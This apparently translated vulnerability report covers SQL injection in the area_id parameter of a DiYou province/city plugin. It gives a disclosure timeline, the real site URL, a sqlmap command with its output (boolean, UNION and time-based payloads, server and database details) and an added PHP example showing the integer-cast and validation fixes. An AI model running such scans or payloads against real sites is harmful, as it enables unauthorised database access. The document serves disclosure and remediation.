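2014-05-15: Details reported to the vendor; awaiting vendor handling
2014-05-16: Vendor confirmed; details disclosed to the vendor only
2014-05-19: Details opened to third-party security partners
2014-07-10: Details disclosed to core white hats and experts in related fields
2014-07-20: Details disclosed to regular white hats
2014-07-30: Details disclosed to intern white hats
2014-08-13: Details disclosed to the public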
=。=
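Module: province/city linked-selection plugin (affects all of V4.0 and 3.1)
A province/city linked-selection plugin that reads its data from the database on the back end; simply casting the province/city/district variables to int is enough!
Location: ./?plugins&q=areas&area_id=174
http://www.diyou.cc/?plugins&q=areas&area_id=174
The GET parameter area_id is not effectively filtered, which leads to an injection.
This is a notice that an injection point exists; no further testing was done. Fix it quickly, quickly, quickly!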
python sqlmap.py -u "http://www.diyou.cc/?plugins&q=areas&area_id=174" -p "area_id" --batch --dbs --tables -D www.diyou.cc

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: area_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: plugins&q=areas&area_id=174 AND 8880=8880

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7161706171,0x4e736851515370696e6d,0x7167616671),NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: plugins&q=areas&area_id=174 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] www.diyou.cc

Database: www.diyou.cc
[154 tables]
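Filter the input effectively
Severity: High
Vulnerability Rank: 10
Confirmed at: 2014-05-16 01:34
Thank you, this has been handed over to the security department to resolve.
None yet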
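
The fix the report recommends (casting the area value to int) shown beside the vulnerable string-concatenation pattern, as an added PHP example that is not DiYou's code or part of the original report. The demo_areas table, its columns and the function names are hypothetical, and an in-memory SQLite database (needs the pdo_sqlite extension) stands in for MySQL.

```php
<?php
// Added example, not DiYou source code. demo_areas and its rows are
// constructed sample data standing in for the plugin's real area table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE demo_areas (id INTEGER PRIMARY KEY, pid INTEGER, name TEXT)');
$db->exec("INSERT INTO demo_areas VALUES (1741, 174, 'City A1'), (1742, 174, 'City A2'), (2001, 200, 'City B1')");

// Vulnerable pattern: the raw GET value becomes part of the SQL text.
function unsafe_sql($areaId) {
    return "SELECT id, name FROM demo_areas WHERE pid = $areaId";
}

// Shared safe query: the value is bound as an integer parameter.
function fetch_children(PDO $db, $id) {
    $stmt = $db->prepare('SELECT id, name FROM demo_areas WHERE pid = ?');
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Fix named in the report: cast to int. Trailing text is discarded, so the
// query is safe, but a malformed request is silently served as area 174.
function children_cast(PDO $db, $areaId) {
    return fetch_children($db, (int) $areaId);
}

// Stricter variant: reject anything that is not a positive integer, so the
// request can be answered with an error and the rejected value logged.
function children_strict(PDO $db, $areaId) {
    $id = filter_var($areaId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : fetch_children($db, $id);
}

// '174' is a normal request; the second value is the boolean test string
// taken from the scanner output quoted in the report.
foreach (['174', '174 AND 8880=8880'] as $raw) {
    $sql    = unsafe_sql($raw);
    $strict = children_strict($db, $raw);
    printf("input : %s\n", $raw);
    printf("  unsafe SQL sent to the database: %s\n", $sql);
    printf("  unsafe rows: %d\n", count($db->query($sql)->fetchAll()));
    printf("  cast rows  : %d\n", count(children_cast($db, $raw)));
    printf("  strict     : %s\n", $strict === null ? 'rejected' : count($strict) . ' rows');
}
```

With the unsafe builder the appended condition reaches the database as part of the WHERE clause; with the cast or the strict check only the integer 174, or nothing at all, does.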